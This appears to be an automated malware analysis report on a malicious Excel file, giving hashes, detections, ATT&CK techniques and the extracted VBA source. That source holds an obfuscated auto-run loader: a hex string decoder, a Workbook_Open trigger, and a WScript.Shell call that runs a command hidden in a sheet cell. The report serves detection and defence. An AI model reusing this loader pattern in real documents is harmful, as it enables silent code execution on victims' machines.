Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a9a1e825dee7abb8…

MALICIOUS

Office (OLE)

181.0 KB Created: 2018-07-19 12:38:55 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: eff1aaa10c3f75599296e956280835f0 SHA-1: e62ee501160d28a85f304159c04cc7b38d0ab8b0 SHA-256: a9a1e825dee7abb8e740c69cd393a9d11834044eedfcbf7908a844723e9043d9
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing obfuscated VBA macros, including a Workbook_Open event, which is a common technique for executing malicious code upon opening. The VBA code uses `CreateObject` and `CallByName` to execute functions, and the `NS_` function appears to decode a string, likely a command or URL. The presence of XLM macros further indicates a downloader functionality.

Heuristics 8

  • ClamAV: Xls.Downloader.Olemal-6934884-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Olemal-6934884-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 228 bytes
SHA-256: 962aaf1d57f0a7207e98bd37b3a4cfa339dc6a87bd287090a5d69186204feb4a
Preview script
First 1,000 lines of the extracted script
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Top
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2957 bytes
SHA-256: 6a0bc3958e9b0206f64d1a23000cad3173078dc4d507e763a945ec826cde5aba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function PYWPOQA_() As String
QRONWOD_ = aIDVHNCYOBUI_:For i = 47 To 88:GCUVWFIIRG_(aMKEVEGIFJ_ & BOGQERAGL_(34, 4), 11)):Next i:SOFRHH_( & vQVAENXR_:For i = 14 To 73:EHHVNUNLKC_(aNAGMDOWG_ & AFMFUSKM_(54, v), 11)):Next i:GMVAEONESNI_(FPOKUD_ & EBAXUHU_(12, 6), 11)):Dim SBTMVZPJMGP_As String = "ZNBPVGIBZZ_":Dim SBTMVZPJMGP_As String = "ZNBPVGIBZZ_":Random(12, 6)VCBVJBLCPSF_:Dim Random(12, 6)VCBVJBLCPSF_:QRONWOD_ = aIDVHNCYOBUI_:Dim SBTMVZPJMGP_As String = "ZNBPVGIBZZ_":QRONWOD_ = aIDVHNCYOBUI_:Random(HNTHIAJJSZB_):
End Function
Public Function NS_(ByVal S_ As String)
   Dim DBL_ As String: Dim J_ As Long: For J_ = 1 To Len(S_) Step 2: DBL_ = DBL_ & Chr(Val("&H" & Mid(S_, J_, 2)) - 62): Next: NS_ = DBL_
End Function
Private Function IHQ_() As String
ITSIGUTPQG_( & vZJKRATUP_:ITSIGUTPQG_( & vZJKRATUP_:For i = 16 To 55:SOSZFTCJIIO_(aAJTXTTH_ & ECILCFQ_(34, 4), 11)):Next i:LBNYSZ_ = aVCKXXUDXEV_:UHQYBV_(SQFHXZDLPT_ & YVGUXRJO_(12, 6), 11)):UHQYBV_(SQFHXZDLPT_ & YVGUXRJO_(12, 6), 11)):UPZQMUOWG_(FYYJMHBL_)):Random(YIXXYC_):Random(12, 6)SCDBORUDD_:Dim JUQBKQCV_As String = "DRYURCXQ_":ITSIGUTPQG_( & vZJKRATUP_:Dim Dim JUQBKQCV_As String = "DRYURCXQ_":ITSIGUTPQG_( & vZJKRATUP_:
End Function
Sub Workbook_Open()
Application.Run NS_("92A6A7B195ADB0A9A0ADADA96C98889D")
End Sub
Private Function SWIO_() As String
OTTWKGLQG_( & vKLASCGZPNFN_:Dim ROKGSJD_As String = "VOHQVGRQQA_":EICONBCZ_(JQKVMZ_)):EICONBCZ_(JQKVMZ_)):Random(12, 6)DKRCEWCFTK_:For i = 22 To 81:KHQMAMSCE_(aSEXOXBB_ & FQLEIAZUY_(54, v), 11)):Next i:EICONBCZ_(JQKVMZ_)):AXDGAGWYDCL_ = aFEYMCGI_:OTTWKGLQG_( & vKLASCGZPNFN_:Random(12, 6)DKRCEWCFTK_:EICONBCZ_(JQKVMZ_)):Dim Dim ROKGSJD_As String = "VOHQVGRQQA_":Random(YTPQABMSHQF_):Random(12, 6)DKRCEWCFTK_:
End Function
Sub ZJ_()
    CallByName CreateObject(NS_("9591A1B0A7AEB26C91A6A3AAAA")), NS_("90B3AC"), VbMethod, NS_(ThisWorkbook.Sheets("Tope").Range("G135").Value), 0, True
End Sub
Private Function VJPC_() As String
IYVJUMLKY_(EDGBFFHGTC_ & BCNWDF_(12, 6), 11)):IYVJUMLKY_(EDGBFFHGTC_ & BCNWDF_(12, 6), 11)):Dim IBSPOV_As String = "LKMJNQBYCAX_":Dim IBSPOV_As String = "LKMJNQBYCAX_":KGVDACL_(XEBLMDFFKCX_)):Dim IYVJUMLKY_(EDGBFFHGTC_ & BCNWDF_(12, 6), 11)):RJOJYC_ = aXOXLMW_:For i = 14 To 63:ERYFXWPQ_(aPLDKTEMY_ & SXPSGNGDSLK_(34, 4), 11)):Next i:For i = 14 To 63:ERYFXWPQ_(aPLDKTEMY_ & SXPSGNGDSLK_(34, 4), 11)):Next i:KGVDACL_(XEBLMDFFKCX_)):IYVJUMLKY_(EDGBFFHGTC_ & BCNWDF_(12, 6), 11)):KGVDACL_(XEBLMDFFKCX_)):Random(12, 6)IUWCBHYOG_:IYVJUMLKY_(EDGBFFHGTC_ & BCNWDF_(12, 6), 11)):For i = 14 To 63:ERYFXWPQ_(aPLDKTEMY_ & SXPSGNGDSLK_(34, 4), 11)):Next i:
End Function